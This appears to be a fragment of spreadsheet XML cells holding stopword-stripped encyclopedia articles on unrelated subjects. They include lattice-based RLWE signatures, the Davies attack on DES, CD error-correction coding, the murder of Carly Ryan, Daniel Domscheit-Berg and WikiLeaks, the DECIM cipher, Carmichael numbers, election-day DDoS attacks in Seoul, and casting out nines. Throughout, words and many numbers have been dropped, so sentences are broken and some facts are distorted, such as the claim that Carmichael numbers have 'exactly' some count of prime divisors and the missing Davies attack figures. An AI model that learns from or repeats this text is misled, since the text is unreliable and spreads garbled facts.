2011 lyubashevsky. details signature extended 2012 gunesyu, lyubashevsky, popplemann 2012 published paper "practical lattice based cryptography signature scheme embedded systems." these papers laid groundwork variety recent signature algorithms based directly ring learning errors problem tied hard rlwe problems. ring learning errors homomorphic encryption (rlwe-hom) purpose homomorphic encryption allow computations sensitive data occur computing devices trusted data. these computing devices allowed process ciphertext output homomorphic encryption. 2011, brakersky vaikuntanathan, published "fully homomorphic encryption ring-lwe security dependent messages" builds homomorphic encryption scheme directly rlwe problem. references</t>
  </si>
  <si>
    <t>Ring learning with errors signature</t>
  </si>
  <si>
    <t>digital signatures means protect digital information intentional modification authenticate source digital information. public cryptography provides rich different cryptographic algorithms create digital signatures. however, primary public signatures currently (rsa elliptic curve signatures) become completely insecure scientists ever able build moderately sized quantum computer. post quantum cryptography class cryptographic algorithms designed resistant attack quantum cryptography. several post quantum digital signature algorithms based hard problems lattices created replace commonly used elliptic curve signatures. subset lattice based scheme based problem known ring learning errors. ring learning errors based digital signatures among post quantum signatures smallest public signature sizes background developments quantum computing past decade optimistic prospects real quantum computers within years begun threaten basic cryptography secures internet. relatively small quantum computer capable processing thousand bits information would easily break widely used public cryptography algorithms used protect privacy digitally sign information internet.one widely used public algorithm used create digital signatures known rsa. security based classical difficulty factoring product large unknown primes constituent primes. integer factorization problem believed intractable conventional computer primes chosen random sufficiently large. however, factor product n-bit primes, quantum computer roughly bits logical qubit memory capable executing program known shor's algorithm easily accomplish task. shor's algorithm also quickly break digital signatures based known discrete logarithm problem esoteric elliptic curve discrete logarithm problem. effect, relatively small quantum computer running shor's algorithm could quickly break digital signatures used ensure privacy integrity information internet today. even though know quantum computer break digital signature algorithms exist, active research past decade create cryptographic algorithms remain secure even attacker resources quantum computer disposal. this area cryptography called post quantum quantum safe cryptography. this article class algorithms: digital signatures based ring learning errors problem. general learning errors problem cryptography introduced oded regev 2005 source several cryptographic designs.the creators ring-based learning errors (rlwe) basis cryptography believe important feature algorithms based ring-learning errors provable reduction known hard problems. signature described provable reduction shortest vector problem ideal lattice. this means attack found ring-lwe cryptosystem whole class presumed hard computational problems solution.the first rlwe based signature developed lyubashevsky paper "fiat-shamir aborts: applications lattice factoring-based signatures" refined "lattice signatures without trapdoors" 2011. number refinements variants followed. this article highlights fundamental mathematical structure rlwe signatures follows original lyubashevsky work work guneysu, lyubashevsky popplemann (glp). this presentation based 2017 update scheme called glyph.a rlwe-sig works quotient ring polynomials modulo degree polynomial φ(x) coefficients finite field prime i.e. ring zq[x]/φ(x) multiplication addition polynomials work usual fashion results multiplication reduced φ(x). presentation typical polynomial expressed {\displaystyle a(x)=a_{0}+a_{1}x+a_{2}x^{2}+\ldots +a_{n-3}x^{n-3}+a_{n-2}x^{n-2}+a_{n-1}x^{n-1}} field representative elements -(q-1)/2, ...-1, (q-1)/2 when power polynomial φ(x) cyclotomic polynomial other choices possible corresponding cyclotomic polynomials complicated security well studied. generating "small" polynomials. rlwe signature uses polynomials considered "small" respect measure called "infinity norm". infinity norm polynomial simply largest absolute value coefficients polynomial coefficients viewed integers rather signature algorithm create random polynomials small respect particular infinity norm bound. this easily done randomly generating coefficients polynomial (a0, ..., an-1) manner guaranteed likely less equal bound. literature ring learning errors, common ways this: using uniform sampling coefficients small polynomial uniformly sampled small coefficients. integer much less randomly choose polynomial coefficients set: -b+1, -b+2. b-2, b-1, infinity norm polynomial (b). using discrete gaussian sampling integer coefficients randomly chosen sampling -(q-1)/2 (q-1)/2 according discrete gaussian distribution mean distribution parameter references provide details method.in rlwe signature glyph used example below, coefficients "small" polynomials uniform sampling method value much smaller value hashing "small" polynomial most rlwe signature algorithms also require ability cryptographically hash arbitrary strings small polynomials according distribution. example uses hash function, polyhash(ω), accepts string, input outputs polynomial coefficients exactly coefficients absolute value greater zero less integer bound (see above). rejection sampling feature rlwe signature algorithms technique known rejection sampling. technique, infinity norm signature polynomial exceeds fixed bound, polynomial discarded signing process begin again. this process repeated infinity norm signature polynomial less equal bound. rejection sampling ensures output signature exploitably correlated signer's secret values. example follows, bound, range uniform sampling described number non-zero coefficients allowed "accepted" polynomial other parameters following glyph noted above, maximum degree polynomials therefore coefficients. typical values 512, 1024. coefficients polynomials field prime congruent n=1024, glyph sets 59393, b=16383 number non-zero coefficients output polyhash equal number non-zero coefficients produced hash function equal cases. security signature scheme closely tied relative sizes details setting parameters found references below.as noted above, polynomial φ(x) defines ring polynomials used finally, a(x) randomly chosen fixed polynomial coefficients -(q-1)/2 (q-1)/2 polynomial a(x) chosen "nothing sleeve" manner one-way hashing output true noise random number generator (trng) using digital expansion well known mathematical constans signers verifiers signatures know φ(x), a(x) b-k. public generation entity wishing sign messages generates public following steps: generate small polynomials s(x) e(x) coefficients chosen uniformly {-b,...-1, ..., compute t(x) a(x)·s(x) e(x) distribute t(x) entity's public keythe polynomials s(x) e(x) serve private t(x) corresponding public key. security signature scheme based following problem. given polynomial t(x) find small polynomials f1(x) f2(x) that: a(x)·f1(x) f2(x) t(x) problem difficult solve, signature scheme difficult forge. [see wikipedia article ring learning errors ideal lattice cryptography details theoretical difficulty problem] signature generation following glyph, sign message expressed string, signing entity following: generate small polynomials y1(x) y2(x) coefficients {-b, ..., ...., compute w(x) a(x)·y1(x) y2(x) w(x) string compute c(x) polyhash(ω (this polynomial non-zero coefficients. denotes concatenation strings) compute z1(x) s(x)·c(x) y1(x) compute z2(x) e(x)·c(x) y2(x) until infinity norms z1(x) z2(x) step (this rejection sampling step noted above) signature triple polynomials c(x), z1(x) z2(x) transmit message along c(x), z1(x) z2(x) verifier. signature verification following glyph, verify message expressed string, verifying entity must possess signer's public (t(x)), signature (c(x), z1(x), z2(x)), message verifier following: verify infinity norms z1(x) z2(x) reject signature. compute w'(x) a(x)·z1(x) z2(x) t(x)c(x) w'(x) string compute c'(x) polyhash(ω' c'(x) c(x) reject signature, otherwise accept signature valid.notice that: a(x)·z1(x) z2(x) t(x)c(x) a(x)·[s(x)·c(x) y1(x)] z2(x) [a(x)·s(x) e(x)]c(x) a(x)·y1(x) z2(x) e(x)·c(x) a(x)y1(x) e(x)·c(x) y2(x) e(x)·c(x) a(x)y1(x) y2(x) w(x) defined above) this brief derivation demonstrates verification process c'(x) c(x) signature tampered with. further developments glyph signature scheme described document closely follows work lyubashevsky, gunesyu popplemen 2011 2012. there number variations work. these include: work galbraith short signatures documented here. work akleylek, bindel, buchmann, kramer marson security proofs signature fewer security assumptions documented here.another approach signatures based lattices rings variant patented ntru family lattice based cryptography. primary example approach signature known bimodal lattice signature scheme (bliss). developed ducas, durmas, lepoint lyubashevsky documented paper "lattice signatures bimodal gaussians." bliss signature scheme references</t>
  </si>
  <si>
    <t>Davies attack</t>
  </si>
  <si>
    <t>cryptography, davies attack dedicated statistical cryptanalysis method attacking data encryption standard (des). attack originally created 1987 donald davies. 1994, biham alex biryukov made significant improvements technique. known-plaintext attack based non-uniform distribution outputs pairs adjacent s-boxes. works collecting many known plaintext/ciphertext pairs calculating empirical distribution certain characteristics. bits deduced given sufficiently many known plaintexts, leaving remaining bits found brute force. there tradeoffs number required plaintexts, number bits found, probability success; attack find bits known plaintexts success rate. davies attack adapted feistel ciphers besides des. 1998, pornin developed techniques analyzing maximizing cipher's resistance kind cryptanalysis. references donald davies, sean murphy september 1993). "pairs triplets s-boxes" (pdf). journal cryptology. (1): 1–25. issn 0933-2790. retrieved september 2018. biham, alex biryukov (may 1994). improvement davies' attack (gzipped postscript). advances cryptology eurocrypt '94. perugia: springer-verlag. 461–467. retrieved january 2007. thomas pornin (october 1998). optimal resistance against davies murphy attack (pdf). advances cryptology asiacrypt '98. beijing: springer-verlag. 148–159. retrieved september 2018.</t>
  </si>
  <si>
    <t>Cross-interleaved Reed–Solomon coding</t>
  </si>
  <si>
    <t>compact disc system, cross-interleaved reed–solomon code (circ) provides error detection error correction. circ adds every three data bytes redundant parity byte. overview reed–solomon codes specifically useful combating mixtures random burst errors. circ corrects error bursts 3,500 bits sequence (2.4 length seen surface) compensates error bursts 12,000 bits (8.5 caused minor scratches. characteristics high random error correctability long burst error correctability case burst correction capability exceeded, interpolation provide concealment approximation simple decoder strategy possible reasonably-sized external random access memory very high efficiency room future introduction four audio channels without major changes format 2008, implemented). interleave errors found compact discs (cds) combination random burst errors. order alleviate strain error control code, form interleaving required. system employs concatenated reed–solomon codes, interleaved cross-wise. judicious positioning stereo channels well audio samples even odd-number instants within interleaving scheme provide error concealment ability, multitude interleave structures used makes possible correct detect errors relatively amount redundancy. references also multiplexing parity (mathematics) parity (telecommunication) checksum error correction reed–solomon error correction</t>
  </si>
  <si>
    <t>Murder of Carly Ryan</t>
  </si>
  <si>
    <t>carly ryan january 1992 february 2007) australian schoolgirl befriended online murdered serial paedophile, 50-year-old garry francis newman. case, highlighted emerging phenomena catfishing, child grooming, online predatory behaviour, unique time, given ryan first person australia killed online predator. wake arrest trial newman, public opinion eventually nationwide legal changes, nicknamed "carly's law", made help protect minors online. background ryan lived stirling, south australia mother, sonya ryan. approximately months death, using myspace (and vampirefreaks.com), befriended "brandon kane", fictitious texas-born teen living melbourne, eventually grew online telephone romance. january 2007, garry newman travelled melbourne posing "shane", father brandon, order give ryan presents (lingerie nurse's outfit) non-existent brandon. after meeting mother, allowed attend ryan's 15th birthday party stay overnight. after shopping trip together, newman's increasingly erratic possessive behaviour party, inappropriate physical advances (including laying onto ryan's her), told leave sonya ryan, began monitoring ryan's internet usage closely. investigation later, february, ryan left house apparent sleepover friends, returning next day, police notified. morning, horseshoe port elliot, ryan's battered dishevelled body found floating face-down shallow water, attempts revive failed. autopsy revealed separate injuries, eight blows head, cause death combination facial trauma, smothering, drowning. also revealed cannabinoids ryan's bloodstream beach sand oesophagus. investigators examined security footage, showed ryan around port elliot february, company men, last seen alive witnesses beach 9:30 pale blue vehicle used police mornington peninsula, raid days murder) arrest newman, detention newman's younger son. search revealed newman kept notebook detailing online personas, criminal attempts grooming australia internationally. trial, newman, initially identified media, acted erratically initially denied meeting teenager. january 2010, newman sentenced life imprisonment 29-year non-parole period. newman's adopted son, minor time witness killing, cleared charges identity remains suppressed. reaction after trial, sonya ryan helped carly ryan foundation, non-profit charity created promote internet safety. 2013, foundation began lobbying legal change improve protection minors online, particularly given teenage australians contacted online people know. foundation also promoted safety awareness australia zealand (such online contracts), created smartphone application, called thread, personal safety children. sonya ryan also received south australian year award 2013 services community, well various awards 2017, 2018 2021. legal changes national after number unsuccessful proposals senator nick xenophon's team, 2017, bill titled criminal code amendment (protecting minors online) bill 2017 submitted parliament australia. purpose bill was: introduce offence criminalise acts done using carriage service prepare plan cause harm procure, engage sexual activity with, person this expressly includes person misrepresenting online part plan cause harm another person years age. proposed changes three federal australian laws: criminal code 1995; crimes 1914; and, telecommunications (interception access) 1979. amended bill passed federal level enacted june 2017. south australia similar, tighter version initially failed pass legislative council south australia 2013. later, following petition, amended bill introduced attorney-general vickie chapman, passed parliament south australia july 2018, made offence adult (aged older) child attempt meet child. these amendments came effect august 2018. also internet homicide murder kacie woody alicia kozakiewicz references external links carly ryan foundation</t>
  </si>
  <si>
    <t>Daniel Domscheit-Berg</t>
  </si>
  <si>
    <t>daniel domscheit-berg (german: [ˈdaːniɛl dɔmʃaɪtˈbɛʁk]; berg; born 1978), previously known pseudonym daniel schmitt, german technology activist. best known former spokesperson wikileaks author inside wikileaks: time julian assange world's most dangerous website (2011).domscheit-berg began working wikileaks meeting assange chaos computer club's annual conference 2007. august 2010 domscheit-berg suspended wikileaks julian assange domscheit-berg challenged assange's effectiveness leader. september 2010 domscheit-berg resigned wikileaks, saying "wikileaks structural problem. longer want take responsibility that's leaving project."after leaving wikileaks, announced plans january 2011 open website anonymous online leaks called openleaks. chaos computer club (ccc) event august 2011, announced preliminary launch invited hackers test security openleaks system, result criticized exploiting good name club promote openleaks project expelled club, despite lack membership. this decision revoked february 2012. september 2011, several news organizations cited domscheit-berg's split julian assange wikileaks series events errors release month 251,287 united states diplomatic cables cablegate affair.in 2011, named foreign policy magazine global thinkers. wikileaks domscheit-berg began working wikileaks meeting assange chaos computer club's annual conference (24c3) 2007. julian assange accused domscheit-berg leaking information organization newsweek. august 2010 domscheit-berg suspended wikileaks julian assange domscheit-berg challenged assange's effectiveness leader, writing "you're even fulfilling role leader right now. leader communicates cultivates trust himself. exact opposite. behave like kind emperor slave trader."on september 2010 domscheit-berg told spiegel resigning, saying "wikileaks structural problem. longer want take responsibility that's leaving project." when domscheit-berg resigned, architect wikileaks' submission platform four staffers also broke assange. architect took submission platform left, disabling wikileaks ability receive documents.a book experience separation wikileaks released germany february 2011, entitled inside wikileaks: meine zeit gefährlichsten website welt ("my time world's most dangerous website"). english translation later released australian publisher scribe publications. domscheit-berg's book criticizes julian assange's leadership style handling afghan diaries. domscheit-berg stated would destroy wikileaks data leaving wikileaks. wanted sure duplicates would confirmed deleted notary affidavit. after leaving, wikileaks stated domscheit-berg representing openleaks, negotiated eleven months unpublished documents internal organisation communications mediation openleaks wikileaks conducted terminated andy müller-maguhn. domscheit-berg told weekly freitag took documents wikileaks me", leading suspension mediations. domscheit-berg eventually kicked chaos computer club müller-maguhn conduct mediation requesting chaos computer club test openleaks' security.wikileaks sources later alleged destruction 3500 unpublished whistleblower communications communications containing hundreds documents, including government's list, bank america leaks, insider information neo-nazi organizations evidence torture government abuse latin american country. response, domscheit-berg said wikileaks' claims destroyed files "false misleading." openleaks december 2010, domscheit-berg announced intention start site named "openleaks" intention transparent wikileaks. last months, wikileaks organization open more. lost open-source promise." instead publishing documents, domscheit-berg said proposed openleaks process would send leaked documents various news entities publishers.openleaks aimed start public operations january 2011. august 2011, domscheit-berg announced four test launch invited thousands hackers attack openleaks site look security flaws chaos communications camp. event, wikileaks associate jacob appelbaum brought rumors openleaks connected german intelligence müller-maguhn expressed skepticism. when openleaks attempted launch test, unable online. time, four european newspapers non-profit group signed receive openleaks documents.on december 2012 domscheit-berg announced website organisation would ahead previously intended would focus providing technology expertise regarding receive documents anonymous sources rather directly facilitating leaks themselves.in july 2013 interview, domscheit-berg said work openleaks would continue, "without much public involvement." personal life domscheit-berg married activist politician anke domscheit-berg. makerspace disused rail station building 2020, domscheit-berg engaged makerspace verstehbahnhof (translated: station understanding). makerspace re-appropriated rooms fürstenberg (havel) station, still use. inside wikileaks daniel domscheit-berg (2011). inside wikileaks: meine zeit gefährlichsten website welt german). berlin: econ verlag. isbn 978-3-430-20121-6. daniel domscheit-berg (2011). inside wikileaks: time julian assange world's dangerous website. carlton north, city melbourne: scribe publications. isbn 978-1-921844-05-8. archived original february 2011. retrieved february 2011. daniel domscheit-berg (2011). inside wikileaks: time julian assange world's most dangerous website. york city: random house. isbn 978-0-307-95191-5. retrieved february 2011. references further reading mcallester, matt. "exit interview." domscheit-berg) york times. february 2011. zetter, kim. "former wikileaks spokesman disputes claims about destroyed files." wired. august 2011. doubt domscheit-berg's integrity': german hacker slams openleaks founder." spiegel. august 2011. last, jonathan "when daniel julian." weekly standard. april 2011. volume taylor, adam. "wikileaks' bank america bombshell have been destroyed." business insider. august 2011. external links openleaks facebook daniel domscheit-berg collected news commentary spiegel conversation ideological split wikileaks/openleaks, fillip</t>
  </si>
  <si>
    <t>Carmen Quesada Santamaría</t>
  </si>
  <si>
    <t>carmen elena quesada santamaría (born october 1969 turrialba, costa rica) costa rican politician teacher. joined social christian unity party teenager later, libertarian movement. 2009 2010, occupied seat directive board atlantic basin ports economical development administrative board (japdeva, spanish initials). 2010 2014 costa rican general election, contested candidate legislative assembly, elected deputy representing limón province 2014–2018 administration. september 2015, left libertarian movement, remaining independent rest term. deputy, member investigative commission panama papers elected first secretary legislative director 2017–2018 period. november 2019, founded costa rican social justice party (partido justicia social costarricense) elected president party. references</t>
  </si>
  <si>
    <t>DECIM</t>
  </si>
  <si>
    <t>cryptography, decim stream cypher algorithm designed come berbain, olivier billet, anne canteaut, nicolas courtois, blandine debraize, henri gilbert, louis goubin, aline gouget, louis granboulan, cédric lauradoux, marine minier, thomas pornin hervé sibert.decim algorithm partly patented authors wished remain freely available. submitted estream project ecrypt network. history decim announced 2005. 2006 flaws identified could leave encypted ciphertext vulnerable attack. revised version cipher, decim well 128-bit security version developed, proving vulnerable attack. references footnotes sources berbain, billet, canteaut, courtois, debraize, gilbert, goubin, gouget, granboulan, lauradoux, minier, pornin, sibert, (2005). decim, stream cipher hardware applications (pdf) (report). estream april 2008). "estream phase candidates status". ecrypt.eu.org. retrieved 2021. lin, ding; jie, guan (january 2012). "related chosen attacks decim decim-128". mathematical computer modelling. (1–2): 123–133. doi:10.1016/j.mcm.2011.01.057. hongjun; preneel, bart (2006). robshaw (ed.). cryptanalysis stream cipher decim. international workshop fast software encryption. lecture notes computer science. vol. 4047. berlin, heidelberg: springer. doi:10.1007/11799313_3. isbn 978-3-540-36597-6.</t>
  </si>
  <si>
    <t>Carmichael number</t>
  </si>
  <si>
    <t>number theory, carmichael number composite number {\displaystyle satisfies modular arithmetic congruence relation: {\displaystyle b^{n-1}\equiv 1{\pmod {n}}} integers {\displaystyle relatively prime {\displaystyle they named robert carmichael. carmichael numbers subset knödel numbers. term "carmichael number" introduced beeger 1950 (oystein called numbers 1948). equivalently, carmichael number composite number {\displaystyle {\displaystyle b^{n}\equiv b{\pmod {n}}} integers {\displaystyle overview fermat's little theorem states prime number, integer number integer multiple carmichael numbers composite numbers property. carmichael numbers also called fermat pseudoprimes absolute fermat pseudoprimes. carmichael number pass fermat primality test every base relatively prime number, even though actually prime. this makes tests based fermat's little theorem less effective strong probable prime tests baillie–psw primality test miller–rabin primality test. however, carmichael number either euler–jacobi pseudoprime strong pseudoprime every base relatively prime theory, either euler strong probable prime test could prove carmichael number fact, composite. arnault gives 397-digit carmichael number {\displaystyle strong pseudoprime prime bases less 307: {\displaystyle n=p\cdot (313(p-1)+1)\cdot (353(p-1)+1)} {\displaystyle 29674495668685510550154174642905332730771991799853043350995075531276838753171770199594238596428121188033664754218345562493168782883is 131-digit prime. {\displaystyle smallest prime factor {\displaystyle carmichael number also (not necessarily strong) pseudoprime bases less {\displaystyle numbers become larger, carmichael numbers become increasingly rare. example, 20,138,200 carmichael numbers 1021 (approximately trillion (5·1013) numbers). korselt's criterion alternative equivalent definition carmichael numbers given korselt's criterion. theorem korselt 1899): positive composite integer {\displaystyle carmichael number {\displaystyle square-free, prime divisors {\displaystyle {\displaystyle true {\displaystyle p-1\mid n-1} follows theorem carmichael numbers odd, since even composite number square-free (and hence prime factor two) least prime factor, thus {\displaystyle p-1\mid n-1} results even dividing odd, contradiction. (the oddness carmichael numbers also follows fact {\displaystyle fermat witness even composite number.) from criterion also follows carmichael numbers cyclic. additionally, follows carmichael numbers exactly prime divisors. discovery korselt first observed basic properties carmichael numbers, give examples. 1910, carmichael found first smallest number, 561, explains name "carmichael number". that carmichael number seen korselt's criterion. indeed, {\displaystyle 561=3\cdot 11\cdot square-free {\displaystyle 2\mid 560} {\displaystyle 10\mid 560} {\displaystyle 16\mid 560} next carmichael numbers (sequence a002997 oeis): 1105 1104 1104 1104 {\displaystyle 1105=5\cdot 13\cdot 17\qquad (4\mid 1104;\quad 12\mid 1104;\quad 16\mid 1104)} 1729 1728 1728 1728 {\displaystyle 1729=7\cdot 13\cdot 19\qquad (6\mid 1728;\quad 12\mid 1728;\quad 18\mid 1728)} 2465 2464 2464 2464 {\displaystyle 2465=5\cdot 17\cdot 29\qquad (4\mid 2464;\quad 16\mid 2464;\quad 28\mid 2464)} 2821 2820 2820 2820 {\displaystyle 2821=7\cdot 13\cdot 31\qquad (6\mid 2820;\quad 12\mid 2820;\quad 30\mid 2820)} 6601 6600 6600 6600 {\displaystyle 6601=7\cdot 23\cdot 41\qquad (6\mid 6600;\quad 22\mid 6600;\quad 40\mid 6600)} 8911 8910 8910 8910 {\displaystyle 8911=7\cdot 19\cdot 67\qquad (6\mid 8910;\quad 18\mid 8910;\quad 66\mid 8910).} these first seven carmichael numbers, 8911, found czech mathematician václav šimerka 1885 (thus preceding carmichael also korselt, although šimerka find anything like korselt's criterion). work, however, remained unnoticed. chernick proved theorem 1939 used construct subset carmichael numbers. number {\displaystyle (6k+1)(12k+1)(18k+1)} carmichael number three factors prime. whether formula produces infinite quantity carmichael numbers open question (though implied dickson's conjecture). paul erdős heuristically argued infinitely many carmichael numbers. 1994 (red) alford, andrew granville carl pomerance used bound olson's constant show really exist infinitely many carmichael numbers. specifically, showed sufficiently large {\displaystyle least {\displaystyle n^{2/7}} carmichael numbers {\displaystyle thomas wright proved {\displaystyle {\displaystyle relatively prime, infinitely many carmichael numbers arithmetic progression {\displaystyle a+k\cdot {\displaystyle k=1,2,\ldots .löh niebuhr 1992 found large carmichael numbers, including 1,101,518 factors million digits. this improved 10,333,229,505 prime factors 295,486,761,787 digits, largest known carmichael number much greater largest known prime. properties factorizations carmichael numbers least three positive prime factors. first carmichael numbers {\displaystyle k=3,4,5,\ldots prime factors (sequence a006931 oeis): first carmichael numbers prime factors (sequence a074379 oeis): second carmichael number (1105) expressed squares ways smaller number. third carmichael number (1729) hardy-ramanujan number: smallest number expressed cubes positive numbers) different ways. distribution {\displaystyle c(x)} denote number carmichael numbers less equal {\displaystyle distribution carmichael numbers powers (sequence a055553 oeis): 1953, knödel proved upper bound: {\displaystyle c(x)&lt;x\exp \left({-k_{1}\left(\log x\log \log x\right)^{\frac {1}{2}}}\right)} constant {\displaystyle k_{1}} 1956, erdős improved bound {\displaystyle c(x)&lt;x\exp \left({\frac {-k_{2}\log x\log \log \log x}{\log \log x}}\right)} constant {\displaystyle k_{2}} gave heuristic argument suggesting upper bound close true growth rate {\displaystyle c(x)} direction, alford, granville pomerance proved 1994 sufficiently large {\displaystyle c(x)&gt;x^{\frac {2}{7}}.} 2005, bound improved harman 0.332 {\displaystyle c(x)&gt;x^{0.332}} subsequently improved exponent 0.7039 0.4736 0.33336704 {\displaystyle 0.7039\cdot 0.4736=0.33336704&gt;1/3} regarding asymptotic distribution carmichael numbers, several conjectures. 1956, erdős conjectured {\displaystyle x^{1-o(1)}} carmichael numbers sufficiently large. 1981, pomerance sharpened erdős' heuristic arguments conjecture least {\displaystyle x\cdot l(x)^{-1+o(1)}} carmichael numbers {\displaystyle {\displaystyle l(x)=\exp {\left({\frac {\log x\log \log \log x}{\log \log x}}\right)}} however, inside current computational ranges (such counts carmichael numbers performed pinch 1021), conjectures borne data. generalizations notion carmichael number generalizes carmichael ideal number field nonzero prime ideal {\displaystyle {\mathfrak {p}}} {\displaystyle {\mathcal {o}}_{k}} {\displaystyle \alpha ^{{\rm {n}}({\mathfrak {p}})}\equiv \alpha {\bmod {\mathfrak {p}}}} {\displaystyle \alpha {\displaystyle {\mathcal {o}}_{k}} {\displaystyle {\rm {n}}({\mathfrak {p}})} norm ideal {\displaystyle {\mathfrak {p}}} (this generalizes fermat's little theorem, {\displaystyle m^{p}\equiv m{\bmod {p}}} integers prime.) call nonzero ideal {\displaystyle {\mathfrak {a}}} {\displaystyle {\mathcal {o}}_{k}} carmichael prime ideal {\displaystyle \alpha ^{{\rm {n}}({\mathfrak {a}})}\equiv \alpha {\bmod {\mathfrak {a}}}} {\displaystyle \alpha {\mathcal {o}}_{k}} {\displaystyle {\rm {n}}({\mathfrak {a}})} norm ideal {\displaystyle {\mathfrak {a}}} when {\displaystyle \mathbf ideal {\displaystyle {\mathfrak {a}}} principal, positive generator ideal {\displaystyle {\mathfrak {a}}=(a)} carmichael exactly carmichael number usual sense. when larger rationals easy write carmichael ideals {\displaystyle {\mathcal {o}}_{k}} prime number splits completely principal ideal {\displaystyle p{\mathcal {o}}_{k}} carmichael ideal. since infinitely many prime numbers split completely number field, infinitely many carmichael ideals {\displaystyle {\mathcal {o}}_{k}} example, prime number ideal gaussian integers carmichael ideal. both prime carmichael numbers satisfy following equality: {\displaystyle \gcd \left(\sum _{x=1}^{n-1}x^{n-1},n\right)=1.} lucas–carmichael number positive composite integer {\displaystyle lucas–carmichael number {\displaystyle square-free, prime divisors {\displaystyle {\displaystyle true {\displaystyle p+1\mid n+1} first lucas–carmichael numbers are: 399, 935, 2015, 2915, 4991, 5719, 7055, 8855, 12719, 18095, 20705, 20999, 22847, 29315, 31535, 46079, 51359, 60059, 63503, 67199, 73535, 76751, 80189, 81719, 88559, 90287, (sequence a006972 oeis) quasi–carmichael number quasi–carmichael numbers squarefree composite numbers property every prime factor divides positively integer besides carmichael numbers, lucas–carmichael numbers. first quasi–carmichael numbers are: 143, 165, 187, 209, 221, 231, 247, 273, 299, 323, 357, 391, 399, 437, 493, 527, 561, 589, 598, 713, 715, 899, 935, 943, 989, 1015, 1073, 1105, 1147, 1189, 1247, 1271, 1295, 1333, 1517, 1537, 1547, 1591, 1595, 1705, 1729, (sequence a257750 oeis) knödel number n-knödel number given positive integer composite number property coprime satisfies {\displaystyle i^{m-n}\equiv 1{\pmod {m}}} case carmichael numbers. higher-order carmichael numbers carmichael numbers generalized using concepts abstract algebra. definition states composite integer carmichael precisely nth-power-raising function ring integers modulo identity function. identity zn-algebra endomorphism restate definition asking algebra endomorphism above, satisfies property whenever prime. nth-power-raising function also defined zn-algebra theorem states prime functions algebra endomorphisms. in-between conditions lies definition carmichael number order positive integer composite number endomorphism every zn-algebra generated zn-module elements. carmichael numbers order ordinary carmichael numbers. order carmichael number according howe, order carmichael number. this product equal 443,372,888,629,441. properties korselt's criterion generalized higher-order carmichael numbers, shown howe. heuristic argument, given paper, appears suggest infinitely many carmichael numbers order however, single carmichael number order known. notes references carmichael, (1910). "note number theory function". bulletin american mathematical society. (5): 232–238. doi:10.1090/s0002-9904-1910-01892-9. carmichael, (1912). composite numbers satisfy fermat congruence {\displaystyle a^{p-1}\equiv 1{\bmod {p}}} american mathematical monthly. (2): 22–27. doi:10.2307/2972687. jstor 2972687. chernick, (1939). fermat's simple theorem" (pdf). bull. amer. math. soc. (4): 269–274. doi:10.1090/s0002-9904-1939-06953-x. korselt, (1899). "problème chinois". l'intermédiaire mathématiciens. 142–143. löh, niebuhr, (1996). algorithm constructing large carmichael numbers" (pdf). math. comp. (214): 823–836. bibcode:1996macom..65..823l. doi:10.1090/s0025-5718-96-00692-8. ribenboim, (1989). book prime number records. springer. isbn 978-0-387-97042-4. šimerka, (1885). "zbytky arithmetické posloupnosti remainders arithmetic progression)". časopis pěstování matematiky fysiky. (5): 221–225. doi:10.21136/cpmf.1885.122245. external links "carmichael number", encyclopedia mathematics, press, 2001 [1994] encyclopedia mathematics table carmichael numbers tables carmichael numbers many prime factors tables carmichael numbers {\displaystyle 10^{18}} "the dullness 1729". mathpages.com. weisstein, eric "carmichael number". mathworld. final answers modular arithmetic</t>
  </si>
  <si>
    <t>DDoS attacks during the October 2011 South Korean by-election</t>
  </si>
  <si>
    <t>ddos attacks october 2011 south korean by-election allegedly separate distributed denial-of-service (ddos) attacks occurred october 2011. attacks, took place october 2011 seoul mayoral by-election, targeted websites national election commission (nec) then-mayoral candidate park won-soon. investigators assert attacks carried hopes suppressing young voters, benefit grand national party. aide grand national party legislator choi gu-sik found responsible attacks. attacks attacks consisted separate denial-of-service attacks independent national election commission mayoral candidate park won-soon, carried help botnet infected computers. attacks conducted morning, citizens--particularly young voters looking vote work--would expected look polling station locations. theorized attacks conducted belief reduce voter turnout, benefit grand national party's candidate kyung-won. police stated attack lasted hours, specifically impacting part website information polling locations; park won-soon's website attacked twice day.the national police agency later revealed aide grand national part lawmaker choi gu-sik, referred media surname "gong," responsible attacks. national police agency later arrested gong four associates.some researchers, however, questioned official narrative. doubts raised whether gong technical expertise resources pull attack. others pointed ddos attack, would unusual parts website offline others online, suggesting perhaps technical failure instead.these events caused collective panic amongst members often denounce online activities south korean progressives. political impact exposure role attacks choi gu-sik officially resigning position lawmaker, along several members gnp.in wake scandal, reformists conservative grand national party pressure core members party closely affiliated myung-bak government; turn park geun-hye brought back spotlight reorganize gnp. social impact more university student associations made joint statement calling thorough investigation attacks. also 2008 grand national party convention bribery incident myung-bak government references</t>
  </si>
  <si>
    <t>Cyxymu</t>
  </si>
  <si>
    <t>cyxymu screen name georgian blogger targeted co-ordinated series attacks social networking sites facebook, google blogger, livejournal twitter, taking latter offline hours august 2009. name mimics cyrillic spelling sukhumi (сухуми), capital town georgian breakaway region abkhazia. blogger, extensively covers suffering georgian civilians abkhazia, accuses russia trying silence using cyberattacks. facebook came defense cyxymu, chief security officer kelly stating simultaneous attack across number properties targeting keep voice heard." before 2009 attack cyxymu's russian-language livejournal blog source information georgia news media 2007 state emergency 2008 russo-georgian war.cyxymu's blog previously targeted denial-of-service attacks october 2008, rendering livejournal servers unavailable three times october 26–27. attack cyxymu internationally seen part ongoing cyberwar russia georgia. also cyberattacks russo-georgian references external links cyxymu twitter cyxymu livejournal</t>
  </si>
  <si>
    <t>Casting out nines</t>
  </si>
  <si>
    <t>casting nines three arithmetical procedures: adding decimal digits positive whole number, optionally ignoring digits multiple result procedure number smaller original whenever original digit, leaves remainder original division nine, obtained original subtracting multiple name procedure derives latter property. repeated application procedure results obtained previous applications single-digit number obtained. this single-digit number called "digital root" original. number divisible digital root otherwise, digital root remainder leaves divided sanity test above-mentioned procedures used check errors arithmetical calculations. test carried applying sequence arithmetical operations digital roots operands applied operands themselves. mistakes made calculations, digital roots resultants same. different, therefore, mistakes must made calculations. digit sums "cast nines" single number, decimal digits simply added together obtain so-called digit sum. digit 2946, example since 2946 effect taking digit 2946 "cast out" lots digit ignored summing digits, effect "cast out" give result more generally, casting nines summing digits, digits multiple ignored. number 3264, example, digits ignoring digits, therefore, summing two, since 3264 computation resulted casting lots 3264. arbitrary number, {\displaystyle 10^{n}d_{n}+10^{n-1}d_{n-1}+\cdots +d_{0}} normally represented sequence decimal digits, {\displaystyle d_{n}d_{n-1}\dots d_{0}} digit {\displaystyle 